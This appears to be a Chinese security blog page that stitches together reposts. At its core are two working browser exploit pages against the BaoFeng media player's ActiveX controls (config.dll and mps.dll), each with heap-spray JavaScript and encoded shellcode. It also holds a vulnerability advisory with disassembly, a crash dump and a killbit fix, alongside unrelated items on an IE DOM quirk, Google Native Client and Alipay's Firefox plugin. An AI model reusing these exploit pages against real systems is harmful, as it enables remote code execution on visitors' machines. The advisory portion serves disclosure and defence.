#
# BaoFeng (config.dll) ActiveX Remote Code Execution Exploit
# Exploit made by etirah
# Download: www.baofeng.com
#
# Problem DLL : config.dll
# Problem Func : SetAttributeValue(param1,param2,param3)
# Problem Param : param1
#
# References:
# 1. http://forum.eviloctal.com/viewthread.php?tid=35051
# 2. http://www.milw0rm.com/exploits/8579
<html>
<body>
<object classid="clsid:BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05" id="target"></object>
<script>
function test()
{
//show messagebox
var shellcode = unescape("\u68fc\u0a6a\u1e38\u6368\ud189\u684f\u7432\u0c91\uf48b\u7e8d\u33f4\ub7db\u2b04\u66e3\u33bb\u5332\u7568\u6573\u5472\ud233\u8b64\u305a\u4b8b\u8b0c\u1c49\u098b\u698b\uad08\u6a3d\u380a\u751e\u9505\u57ff\u95f8\u8b60\u3c45\u4c8b\u7805\ucd03\u598b\u0320\u33dd\u47ff\u348b\u03bb\u99f5\ube0f\u3a06\u74c4\uc108\u07ca\ud003\ueb46\u3bf1\u2454\u751c\u8be4\u2459\udd03\u8b66\u7b3c\u598b\u031c\u03dd\ubb2c\u5f95\u57ab\u3d61\u0a6a\u1e38\ua975\udb33\u6853\u6574\u7473\uc48b\u6853\u3a20\u292d\u7468\u2065\u6820\u6168\u6972\ud48b\u5053\u5352\u57ff\u53fc\u57ff\u00f8");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace)
bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000)
block = block+block+fillblock;
memory = new Array();
for (x=0; x<300; x++)
memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 264)
buffer+=unescape("%u0c0c%u0c0c");
target.SetAttributeValue(buffer, ":-)", "(-:");
}
test();
</script>
</body>
</html>转自:http://www.pcsec.org/archives/BaoFeng-config-dll-ActiveX-Remote-Code-Execution-Exploit.html
在IE下,获取Param的时候有个诡异现象(不知道算不算bug)。为了清晰起见,下面用最简单的HTML和JavaScript来说明。有这么一段HTML(head部分是标准的head,doctype使用xhtml-transitional的DTD):
<body>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0" width="100%" height="100%">
<param name="movie" value="Test.swf" />
<param name="quality" value="high" />
<embed src="Test.swf" quality="high" pluginspage="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="100%" height="100%"></embed>
</object>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0" width="100%" height="100%">
<param name="movie" value="Test.swf" />
<param name="quality" value="high" />
<embed src="Test.swf" quality="high" pluginspage="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="100%" height="100%"></embed>
</body>
</object>现在,我们分别用两种方式来获取第一个object(swf)的param参数个数:
var o = document.getElementsByTagName('object')[0];
alert(o.getElementsByTagName('param').length);
alert(o.childNodes.length);猜猜结果分别是什么?还有,再猜猜o.innerHTML是什么?大家可以自己试试。上面的结果分别是4和2,是不是很诡异?
转自:http://ooboy.net/blog/article/687.aspx
#
# BaoFeng (mps.dll) Remote Code Execution Exploit
# By: MITBOY
# Download: www.baofeng.com
#
# Problem DLL : mps.dll
# Problem Func : OnBeforeVideoDownload()
<html>
<body>
<object classid="clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB" id="target"></object>
<input type="button" onclick="test()" value="test" />
<script>
function test()
{
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace)
bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000)
block = block+block+fillblock;
memory = new Array();
for (x=0; x<300; x++)
memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 4150)
buffer+="\x0c\x0c\x0c\x0c";
target.OnBeforeVideoDownload(buffer);
}
</script>
</body>
</html>转自:http://www.rootkit.net.cn/default.asp?id=119
暴风影音2009(Config.dll)ActiveX远程栈溢出漏洞
by bugvuln(bugvuln_at_gmail.com)
niklen(niklenxyz_at_gmail.com)描述:
暴风影音是国内一款相当流行的万能播放器
http://www.baofeng.com/
受影响的系统:
暴风影音2009 <=[3.09.04.17]
细节:
clsid:BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05
C:\Program Files\StormII\Config.dll
Sub SetAttributeValue (
ByVal lpQueryStr As String ,
ByVal bstrAttributeName As String ,
ByVal lpValueStr As String
)
当参数lpQueryStr是一个超长字符串时,发生栈溢出,利用堆填充技术,攻击者可以很轻松的利用此漏洞执行任意代码
分析:
.text:10009A4C push ebp
.text:10009A4D mov ebp, esp
.text:10009A4F sub esp, 208h ; 开辟208h的堆栈空间
.text:10009A55 cmp [ebp+Source], 0 ; 判断参数1是否为空
.text:10009A59 jz short loc_10009AA8
.text:10009A5B cmp [ebp+arg_C], 0 ; 判断参数3是否为空
.text:10009A5F jz short loc_10009AA8
.text:10009A61 push [ebp+Source] ; 参数1
.text:10009A64 lea eax, [ebp+String]
.text:10009A6A push eax ; eax正好指向ebp-208h的堆栈区域
.text:10009A6B call ds:wcscpy ; oh,my god,不进行参数合法性检查,直接开始拷贝操作,
.text:10009A6B ; 哦豁了,eax指向的堆栈区域全部被超长非法参数占领了-_-!
.text:10009A71 pop ecx
.text:10009A72 lea eax, [ebp+String]
.text:10009A78 pop ecx
.text:10009A79 push [ebp+arg_8]
.text:10009A7C push offset String ; "/@"
.text:10009A81 push offset aSS ; "%s%s"
.text:10009A86 push eax ; String
.text:10009A87 call ds:swprintf ; 上面的拷贝直接影响到这里的swprintf,相当于再对eax指向的堆栈进行一次拷贝操作
; 没有上边的拷贝,这里也要出问题
.text:10009A8D add esp, 10h
.text:10009A90 lea eax, [ebp+String]
.text:10009A96 push [ebp+arg_C]
.text:10009A99 push eax
.text:10009A9A call sub_10001201
.text:10009A9F mov ecx, eax
.text:10009AA1 call sub_1000CC9A
.text:10009AA6 jmp short locret_10009AAD
.text:10009AA8 ; ---------------------------------------------------------------------------
.text:10009AA8
.text:10009AA8 loc_10009AA8: ; CODE XREF: sub_10009A4C+D�j
.text:10009AA8 ; sub_10009A4C+13�j
.text:10009AA8 mov eax, 80004005h
.text:10009AAD
.text:10009AAD locret_10009AAD: ; CODE XREF: sub_10009A4C+5A�j
.text:10009AAD leave
.text:10009AAE retn 10h ; 就这样返回,哦豁了
ModLoad: 41f50000 41fc7000 C:\WINDOWS\system32\mshtmled.dll
ModLoad: 10000000 10020000 C:\Program Files\StormII\Config.dll
ModLoad: 63380000 633f8000 C:\WINDOWS\system32\jscript.dll
(eec.ee8): Illegal instruction - code c000001d (first chance)
(eec.ee8): Illegal instruction - code c000001d (!!! second chance !!!)
eax=80004005 ebx=100116b0 ecx=0175f998 edx=00030001 esi=0039fe98 edi=00000000
eip=00410061 esp=0175f5ec ebp=00410041 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\Internet Explorer\IEXPLORE.EXE
IEXPLORE+0×10061:
00410061 ff ???
解决办法:
在厂商没有推出相应的补丁之前,
建议用户通过注册表对相应的CLSID:BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05设置Killbit
或者将以下文本保存为.REG文件并导入:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05}]
“Compatibility Flags”=dword:00000400
–EOF–
据国外媒体报道,Google公布了新的软件开发计划,它允许网络开发者编写更强大的Web程序,这些程序直接通过系统运行而不用通过浏览器来进行。Google工程师在几天发布了名为Native Client的开发软件,它是一款开源软件。虽然目前正处于发展的早期。
但是Google称,它到最后将允许网络开发者开发和桌面软件一样的的web程序,这些程序将带来更快的速度。Native Client类似于微软的ActiveX技术,它还能在Linux和Mac OS X下运行。目前它尚未支持IE,仅支持Google Chrome, Firefox, Safari 和Opera。
转自:http://www.cnbeta.com/articles/71827.htm
郁闷,以前为了这个伤透了脑筋,找到过一个可以让Firefox支持activex的插件,不过功能很少,而且对安全性有点怀疑,所以就没有用.平时用支付宝都是直接用Firefox上的ie tab了,今天无意间看到支付宝上的有非IE的控件下载,嘿嘿,马上试用,不过效果不佳.不知道是不是人品问题,偶装了插件也不能用..无语了,下面有下载地址,大家可以试下看能不能用.....看图
Alipay官方提供的 https://img.alipay.com/download/aliedit/npaliedit.exe
Moziall提供的 https://addons.mozilla.org/zh-CN/firefox/addon/6707
这两个地址都为安全链接,请大家在网上下载时注意安全哦...
绿色版的Firefox建意安装Moziall提供的插件,直接就会安装了.因为Alipay提供的会检测注册表中是否有Firefox的安装路径,要是绿色版的话,因为不存在,所以无法安装,当然可以采用软件解包一下安装程序,所app目录中的两个文件npaliedit.dll npaliedit.xpt拷到Firefox的plugins目录就好了.我安装的时候两种方法全试了,不过不行,就是一直如上图提示请点此处输入密码,郁闷死我了.